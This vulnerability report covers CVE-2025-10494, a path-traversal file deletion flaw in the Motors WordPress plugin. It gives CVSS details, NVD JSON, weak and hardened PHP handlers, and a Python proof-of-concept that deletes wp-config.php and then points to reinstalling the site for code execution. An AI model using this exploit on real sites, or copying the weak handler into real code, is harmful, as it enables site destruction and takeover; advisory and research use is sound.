Security Vulnerability Report
CVE-2025-10494 CVSS 8.1 HIGH

CVE-2025-10494

Published: 2025-10-08 04:16:12
Last Modified: 2026-04-15 00:35:42

Description

The Motors – Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation when deleting profile pictures in all versions up to, and including, 1.4.89. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
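The root cause described above is the classic CWE-73 pattern: a client-supplied value is used to build a filesystem path, and nothing constrains the result to the directory the feature is meant to touch. The following PHP is an added illustration written for this page, not code from the Motors plugin or from the changeset that fixed it; the action name, nonce action and capability choice are assumptions. It shows the weak pattern next to a hardened handler that treats the parameter as a WordPress attachment ID, checks ownership, and still verifies that the resolved file sits inside the uploads directory before deleting it.

```php
<?php
// Added example (not the Motors plugin's code). Names below are assumptions:
// the AJAX action "example_delete_profile_picture" and the nonce action
// "example_profile_picture" are placeholders chosen for this illustration.

// Weak pattern: the request value is joined straight onto the uploads
// directory, so a traversal sequence escapes it and any file the web server
// user can write becomes deletable (CWE-73).
function example_delete_profile_picture_weak() {
    $upload = wp_upload_dir();
    $path   = $upload['basedir'] . '/profile-pictures/' . $_POST['image_id'];
    @unlink( $path );
}

// Hardened helper: resolve both paths and require the file to stay inside
// the intended directory. realpath() collapses "..", symlinks and "./".
function example_path_within_dir( string $candidate, string $base_dir ) {
    $real_base = realpath( $base_dir );
    $real_path = realpath( $candidate );
    if ( false === $real_base || false === $real_path ) {
        return false; // base directory missing or file does not exist
    }
    // Compare with a trailing separator so "/uploads-other" cannot match "/uploads".
    $prefix = rtrim( $real_base, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR;
    return 0 === strpos( $real_path, $prefix );
}

// Hardened handler: the parameter is an attachment ID, never a path.
function example_delete_profile_picture_hardened() {
    check_ajax_referer( 'example_profile_picture', 'nonce' ); // assumed nonce action
    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'not logged in', 403 );
    }

    $attachment_id = absint( $_POST['image_id'] ?? 0 );
    $attachment    = get_post( $attachment_id );
    if ( ! $attachment || 'attachment' !== $attachment->post_type ) {
        wp_send_json_error( 'no such attachment', 404 );
    }

    // Ownership: a Subscriber may only remove an attachment they uploaded.
    if ( (int) $attachment->post_author !== get_current_user_id()
        && ! current_user_can( 'delete_others_posts' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Defence in depth: even the path WordPress stored must resolve inside uploads.
    $upload = wp_upload_dir();
    $file   = get_attached_file( $attachment_id );
    if ( ! $file || ! example_path_within_dir( $file, $upload['basedir'] ) ) {
        wp_send_json_error( 'file outside uploads directory', 400 );
    }

    // wp_delete_attachment() removes the file, its sizes and the post record.
    wp_delete_attachment( $attachment_id, true );
    wp_send_json_success();
}
add_action( 'wp_ajax_example_delete_profile_picture', 'example_delete_profile_picture_hardened' );
```

Two design points matter here. First, the hardened handler never lets the request name a file at all; it names a post ID, and the filesystem location comes from WordPress's own metadata, which removes the traversal surface rather than filtering it. Second, the `realpath()` prefix check is kept even so, because stored paths can be corrupted or symlinked, and a delete primitive against wp-config.php is exactly what the CVSS vector's I:H/A:H rating reflects.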

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Motors – Car Dealership & Classified Listings Plugin <= 1.4.89

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10494 PoC - Motors Plugin Arbitrary File Deletion
# Vulnerability: Insufficient file path validation in profile picture deletion
# Affected: Motors Plugin <= 1.4.89
# Auth required: Subscriber level or above

import requests

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "password123"

# Step 1: Login to WordPress as Subscriber
session = requests.Session()

# Get login page to retrieve nonce
login_page = session.get(f"{TARGET_URL}/wp-login.php")

# Perform login
login_data = {
    "log": USERNAME,
    "pwd": PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1"
}
session.post(f"{TARGET_URL}/wp-login.php", data=login_data)

# Step 2: Exploit arbitrary file deletion via path traversal
# The vulnerable endpoint processes the file path without validation
target_file = "../../../wp-config.php"  # Path traversal to delete wp-config.php

delete_endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"
exploit_data = {
    "action": "motors_delete_profile_picture",
    "image_id": target_file,  # Malicious path traversal payload
    "nonce": "obtained_nonce_value"
}

response = session.post(delete_endpoint, data=exploit_data)
print(f"Status: {response.status_code}")
print(f"Response: {response.text}")

# After deletion of wp-config.php, site enters install wizard
# Attacker can then reconfigure with malicious DB to achieve RCE
print("\n[*] If successful, wp-config.php has been deleted.")
print("[*] Access /wp-admin/install.php to reconfigure the site.")
```

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3369415%40motors-car-dealership-classified-listings%2Ftrunk&old=3367132%40motors-car-dealership-classified-listings%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/e6066890-75b9-468d-9f67-78e93f58dcc1?source=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-10494",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-08T04:16:11.527",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Motors – Car Dealership & Classified Listings Plugin plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation when deleting profile pictures in all versions up to, and including, 1.4.89. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php)."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-73"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3369415%40motors-car-dealership-classified-listings%2Ftrunk&old=3367132%40motors-car-dealership-classified-listings%2Ftrunk&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e6066890-75b9-468d-9f67-78e93f58dcc1?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}